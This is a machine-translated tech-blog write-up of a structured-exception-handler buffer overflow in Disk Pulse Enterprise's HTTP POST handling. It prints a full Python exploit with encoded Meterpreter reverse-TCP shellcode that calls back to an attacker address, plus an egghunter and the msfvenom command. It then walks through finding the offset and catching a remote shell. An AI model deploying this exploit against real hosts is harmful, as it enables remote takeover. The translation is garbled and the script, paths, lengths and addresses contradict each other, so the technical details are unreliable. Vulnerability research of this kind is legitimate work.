Shulou(Shulou.com)05/31 Report--

Today, the editor will show you how to analyze vulnerabilities in Disk Pulse Eneterprise Window applications. The knowledge points in this article are very detailed. Friends who feel helpful can browse the content of the article with the editor, hoping to help more friends who want to solve this problem to find the answer to the problem. Follow the editor to learn more about "how to achieve vulnerability analysis of Disk Pulse Eneterprise Window applications".

I. brief introduction of loopholes

Disk Pulse Eneterprise is a software that monitors disk changes. It can connect and manage the software through a management port 9120 or web management window 80 to monitor disk changes. There is a dynamic link library libspp.dll in Disk Pulse Eneterprise, in which there are some functions responsible for HTTP operation. The problem arises in this dynamic link library. When processing the post-data, because there is no strict length control for the post-data, it causes a buffer overflow to the invalid memory copy data when the data is obtained, triggers the SEH exception behavior handling, and finally controls EIP to execute arbitrary code.

Software download link: https://[www.exploit-db.com/apps/a679e77e57bf178b22bff5e86409a451-diskpulseent_setup_v9.0.34.exe](http://www.exploit-db.com/apps/a679e77e57bf178b22bff5e86409a451-diskpulseent_setup_v9.0.34.exe)

Vulnerability disclosure address: https://[www.exploit-db.com/exploits/40452](http://www.exploit-db.com/exploits/40452)

Second, the experimental environment

Windows 7 x86: system environment

IDA pro: static analysis tool

Immune debugger: special debugger for vulnerability analysis

WinDbg: vulnerability debugger

Third, loophole analysis

First take a brief look at POC, which is a comprehensive buffer overflow vulnerability. It involves SEH structured exception handlers and egghunter technology.

Overview of SEH

Structured exception handling (SEH) is a window mechanism for handling hardware and software exceptions, and people who are familiar with programming may be familiar with exception handling structures. It is usually represented as a block of try / catch code that tries / divides and.

Overview of Egghunter

Simply put, it is an addressing technique that performs shellcode by designing a tag and then jumping to the location of another tag. Egghunter technology is needed when the buffer is too small to hold our shellcode storage.

First of all, let's analyze POC.

#! / usr/bin/pythonimport socketimport syss=socket.socket (socket.AF_INET,socket.SOCK_STREAM) connect=s.connect ('192.168.46.160' 80) # msfvenom-a x86-- platform Windows-p windows/meterpreter/reverse_tcp LHOST=192.168.46.171 LPORT=4444-e x86/shikata_ga_nai-b'\ x00\ x0a\ x0d\ x26'- f python-- smallestbuf = "" buf + = "buf + ="\ xdb\ xdf\ xd9\ x74\ x24\ xf4\ x92\ xa7\ xae\ xd7\ x5b\ x29 "buf + ="\ xc9\ xb1\ x56\ x31\ x18\ x83\ xc3\ x04\ x03\ x53\ x86\ x45 "buf + ="\ x5b\ x2b\ x4e\ X0b\ xa4\ xd4\ X8e\ X6c\ X31\ xbf\ xac\ x4a "buf + ="\ X31\ xef\ X1c\ x18\ x17\ X03\ xd6\ X8c\ x9a\ x58\ xa3 "buf + ="\ x11\ x10\ x8a\ x09\ x8d\ X20\ X50\ xd0\ X6d\ x19 "buf + ="\ X9b\ X25\ X6f\ X5e\ xc6 xc4\ X3d\ X37\ X8c\ x7b\ xd2\ X3c\ xd8 "buf + ="\ x47\ x59\ x0e\ xcc\ xbe\ xc6\ xef\ xfe\ x10\ x5d\ xb6\ x20 "buf + ="\ x92\ xb2\ xc2\ x68\ x8c\ xd7\ xef\ x23\ x23\ x9b\ xb5\ xe1 "buf + ="\ x7a\ x64\ x19\ xcc\ xb3\ x63\ x08\ x73\ x48\ x16\ x60\ x80 "buf + ="\ xf5\ x21\ xb7\ xfb\ x21\ xa7\ x2c\ x5b\ xa1\ x5f\ x5a\ x66 "buf + ="\ xf9\ x5a\ x50\ xc3\ x8d\ x05\ x74\ xd2\ x42\ x3e\ x80\ x5f\ x65 "buf + ="\ X91\ X01\ x1b\ x42\ x35\ x4a\ xff\ xeb\ x36\ xae\ x14\ x6e "buf + ="\ x99\ X0f\ xb1\ xe4\ x37\ x5b\ xa6\ x5f\ xa8\ xe1\ x58\ x9f "buf + =" xa6\ X72\ x2a\ xad\ x69\ x29\ xa4\ X9d\ xe2\ xf7\ x33\ xe5 "buf + ="\ x07\ xeb\ x1e\ x65\ xf6\ X0c\ X5e\ xaf\ x3D\ x58\ x0e\ xc7\ x94 "buf + ="\ xe1\ xc5\ x17\ x18\ x34\ x73\ x12\ x8e\ x77\ x2b\ x0c\ xe5\ x10 "buf + ="\ x29\ x51\ xe8\ xbc\ xa4\ xb7\ x5a\ x6d\ xe6\ x67\ x1b\ xdd\ x46 "buf + ="\ xd8\ xf3\ x37\ x49\ xe3\ x37\ x80\ x20\ x8e\ xd7\ x7c\ x18 "buf + ="\ x27\ x41\ x25\ xd2\ xd6\ X8e\ xf0\ X9e\ xd9\ X05\ xf0\ x5f\ x97 "buf + ="\ xed\ x71\ x4c\ xc0\ x89\ x79\ x8c\ x11\ x3c\ x79\ xe6\ x15\ x96 "buf + ="\ x2e\ x9e\ x17\ xcf\ x18\ X01\ xe7\ X3a\ x17\ xbb\ x2d "buf + ="\ X3c\ X2e\ x29\ x11\ x2a\ X4f\ xbd\ x91\ x19\ xd7\ x91\ xc2 " "buf + ="\ xfd\ x83\ xc2\ xf7\ X01\ x1e\ x77\ xa4\ x97\ xa1\ x21\ x18\ x3f "buf + ="\ xca\ xcf\ x47\ x55\ x30\ xa2\ x0b\ x92\ xce\ x24\ x3b "buf + ="\ xa6\ xca\ x74\ xbb\ x36\ x74\ xeb\ x5e\ x5a\ x04\ xae "buf + ="\ xbf\ x71\ X4d\ xa6\ x4a\ x14\ X3f\ x57\ x4a\ x3d\ xe1\ xc9\ X4b "buf + ="\ xb2\ x3a\ xfa\ x36\ xbb\ xfb\ xc6\ xd5\ xd9\ xfc\ xc6\ xd9 "buf + ="\ xdf\ xc1\ X10\ xe0\ x95\ x04\ xa1\ x57\ xa5\ x84\ x2c "buf + ="\ x3b\ X9a\ X01\ x65 "# pop pop ret 1001A333nseh ="\ xEB\ x0B\ x90\ x90 "seh ="\ X66\ xA3\ X01\ x10 "egghunter ="\ X66\ X81\ xca\ xff\ X42\ x52\ x6a " \ x02\ x58\ xcd\ x2e\ x3c\ x05\ x5a\ x74 "egghunter + ="\ xef\ xb8\ x77\ x30\ x30\ x74\ xfa\ xaf\ x75\ xea\ x75\ xe7\ xff\ xe7 "evil =" POST / admin HTTP/1.1\ r\ n "evil + =" Host: 192.168.46.160\ r\ n "evil + =" User-Agent: Mozilla/5.0\ r\ n "evil + =" Connection: close\ r\ n "evil + =" Accept textml: Application/xhtml+xml,application/xml QQ en-us,en;q=0.5 0.9 minus r\ n "evil + =" Accept-Language: en-us,en;q=0.5\ r\ n "evil + =" Accept-Charset: ISO-8859-1 mor utf Mei8 * Qroom0.7\ r\ n "evil + =" Keep-Alive: 300\ r\ n "evil + =" Proxy-Connection: keep-alive\ r\ n "evil + =" Content-Type: application/x-www-form-urlencoded\ r\ n "evil + =" Content-Length: 21000\ r\ n\ r\ n "evil + ="\ x41 "* 12292 # subtract/add for payloadevil + =" w00tw00t "evil + ="\ x90 "* 20evil + = bufevil ="\ x90 "* 50evil + ="\ x42 "* 1554evil + = nsehevil + = sehevil + = "\ x90" * 20evil + = egghunterevil + = "\ x90" * 7000print 'Sending evil buffer...'s.send (evil) print' Payload Sentrooms.close ()

When the attacker builds the http request packet, you can see that the post request, url is / login,content-length:17000. Send 12292 "\ x41" bytes, then send "w00tw00t" 8 bytes, then send 20 "\ X90" NOP bytes, then send buf, plus 50 NOP,1614 "\ X42", followed by SEH exception handling mechanism (students who don't know much about it can learn more about it), and then egghunter execution code, which probably means to jump to a place with double "w00t" to execute. All that's left is the filling of the buffer.

Next, we use the text DBG to open the application with a vulnerable version.

Send a payload and trigger a vulnerability. Enter grams, the return address is overwritten, and KB view stack calls.

Here, the GetNextString function of libspp.dll 's SCA_HttpParser is called, and then the program enters the SHE exception behavior handling and calls the code execution by overriding the SEH Handler.

Open IDA and analyze 10092822. In libspp, the SCA_HttpParse class is responsible for handling some operations related to HTTP, and a function named ExtractPostData is responsible for the post-processing data, which is a breakpoint at the entry of this function. The entry address of this function is 10092510

The send buffer is all replaced by a POC to trigger the vulnerability, as shown in the following figure:

Check the passing of parameters. The later data is passed in as the second parameter. Note that it is passed in completely.

Here we continue to step through to the GetNetString function we mentioned earlier.

This function will do one thing, that is, split the first parameter, that is, the later data, and separate each part for subsequent processing. Step by step, you can see that after entering the GetNextString for the first time, the first data is split.

The user name is separated for the first time, and then you enter GetNextString again to split the second string, which performs a series of copy operations.

This LOC block is responsible for copying, where the 10092822 address is the key location to trigger the vulnerability, ESI is the first address of the buffer to be copied, EDX is the copy length, and CL is the copy content, which is copied word by word.

Therefore, when the open buffer size is exceeded, the problem of copying to an invalid address occurs.

If you look at the value of EDX + ESI, you can see that the size of the open buffer has been exceeded, followed by an invalid buffer.

Then take a look at the value of ECX.

CL is a byte-by-byte copy of the low address of ECX. Here, due to copying to an invalid address, SEH exception handling is thrown, and finally the code is executed. Let's take a look at the pseudo code.

Let's take a look at the pseudocode of the GetNextString function.

IV. Vulnerability exploitation

First send poc, trigger the vulnerability, use the immune debugger, check her chain, and be successfully overwritten.

We need to find the offset of SHE.

Use the Mona Lisa command to generate 20000 characters

! Mona pattern_create 20000

After running, you can find it in\ pattern.txt of C:\ log\ FTPServer.

Restart the program and add it to the script's BUF to run

Use the Mona Lisa command to find the SEH offset

! Mona findmsp

Check the Mona Lisa's console output and find its section that describes the SHE offset.

The offset is 14292.

Next, look for the address of pop pop ret

Use! Mona seh

Open the seh.txt log to find the address of the code block that points to the POP POP RET sequence.

In the shellcode set up

Nseh = "\ xEB\ x0B\ x90\ x90" seh = "\ x33\ xA3\ X01\ x10"

Using msf to generate general shellcode, the command is as follows

Msfvenom-a x86-- platform Windows-pwindows / meterpreter / reverse_tcp LHOST = 192.168.46.171 LPORT = 4444-ex86 / shikata_ga_nai-b'\ x00\ x0a\ x0d\ x26 words f python-smallest

For the shellcode written in POC, during the rewrite process, the value of the subsequent offset is modified according to the length of the BUF.

Restart the program, open Metasploit

Select the development mode

Enter commands, set parameters

Send a poc, trigger the vulnerability, view the metasploit response, enter shell, and connect to the shell of the vulnerable host.

5. Characteristics of vulnerability exploitation:

Request method: POST

Request path: / login

Vulnerability characteristics: POST + arbitrary path + content length: > 14292 + | eb | + any byte + | 9090 |

VI. Defense suggestions

Upgrade the application, patch the application or download a new version of the application, or load antivirus software.

Download address: https://www.diskpulse.com/downloads.html

Thank you for your reading, the above is the whole content of "how to achieve vulnerability analysis of Disk Pulse Eneterprise Window applications", learn friends to hurry up to do it. I believe that the editor will certainly bring you better quality articles. Thank you for your support to the website!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.